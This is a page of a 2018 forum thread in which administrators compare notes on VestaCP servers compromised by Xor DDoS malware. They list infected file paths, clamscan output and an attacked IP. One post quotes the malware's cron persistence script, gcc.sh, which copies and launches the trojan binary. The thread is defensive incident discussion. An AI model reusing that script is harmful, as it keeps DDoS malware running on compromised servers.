Page 1 of 55
Got 10 VestaCP servers exploited
Posted: Sat Apr 07, 2018 2:56 pm
by albertus
Hello!
Today I was surprised to discover that 10 of our customers servers were being exploited (attacking a chinese IP). All these servers have nothing in common but the fact they all run VestaCP. None of my non-VestaCP servers were affected.
I would like to ask if anyone was also affected. Any chance there's a VestaCP vulnerability being exploited in the wild?
Thank you in advance
Kindly, Albertus
Re: Got 10 VestaCP servers exploited
Posted: Sat Apr 07, 2018 3:35 pm
by lukapaunovic
This happened to my clients.
I have 3 clients from different geographic locations.
all they have in common is that their server got suspended by ovh and that they are using vesta.
They all allegedly did some syn flood to the same IP:
111.231.132.129
Which is crazy.
Re: Got 10 VestaCP servers exploited
Posted: Sat Apr 07, 2018 3:35 pm
by dpeca
Albertus, where are your servers?
OVH ?
Re: Got 10 VestaCP servers exploited
Posted: Sat Apr 07, 2018 3:37 pm
by lukapaunovic
Interestingly the OVH refuses to provide access via rescue to backup files so i can investigate what happened.
for one server they provided read-only FTP access and i can't read/download/open any of the files.
This is really suspicious to me.
It looks like ovh nodes got hacked
Re: Got 10 VestaCP servers exploited
Posted: Sat Apr 07, 2018 3:55 pm
by dpeca
Albertus, can you tell us in what variant you installed Vesta, default (nginx+apache) or nginx+fpm?
What linux distribution you are using?
Re: Got 10 VestaCP servers exploited
Posted: Sat Apr 07, 2018 3:58 pm
by StudioMaX
Me too. I've created
another thread (in russian). But my provider is FastVPS, not OVH.
Re: Got 10 VestaCP servers exploited
Posted: Sat Apr 07, 2018 4:11 pm
by lukapaunovic
One of the clients VPS at OVh got unlocked.
first they highly resisted even giving rescue access to the files and then they simply unlocked and it didn't say what's the deal.
I am going just to block that IP in firewall. as i found no evidence in logs after server got unlocked it was attacked like they claim
Re: Got 10 VestaCP servers exploited
Posted: Sat Apr 07, 2018 4:50 pm
by dmitry-itldc
The same thing - some VDS's was exploited, all has Vesta installed on Centos 7, as far as I see.
Most of systems was compromised few days ago (4-5 april). Malicious software, used for attacks - a variant of Linux/Xorddos.C (
https://en.wikipedia.org/wiki/Xor_DDoS), you can find files like gcc.sh, /tmp/update, /usr/lib/libudev.so.
Clamscan can detect this malware, for example:
# clamscan -r -i /usr
/usr/bin/tcfndpnals: Unix.Trojan.DDoS_XOR-1 FOUND
/usr/lib/libudev.so: Unix.Trojan.DDoS_XOR-1 FOUND
We still investigating how systems was compromised.
Re: Got 10 VestaCP servers exploited
Posted: Sat Apr 07, 2018 5:03 pm
by StudioMaX
Found in /etc/cron.hourly/gcc.sh, modified 04.04.2018 16:25:00
Code: Select all
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
I did not think that the infection was a few days ago. Analyzed all the logs for today - nothing suspicious, no authorization in Vesta and so on.
Re: Got 10 VestaCP servers exploited
Posted: Sat Apr 07, 2018 5:11 pm
by lukapaunovic
i also see gcc.sh present and unix tool....
:(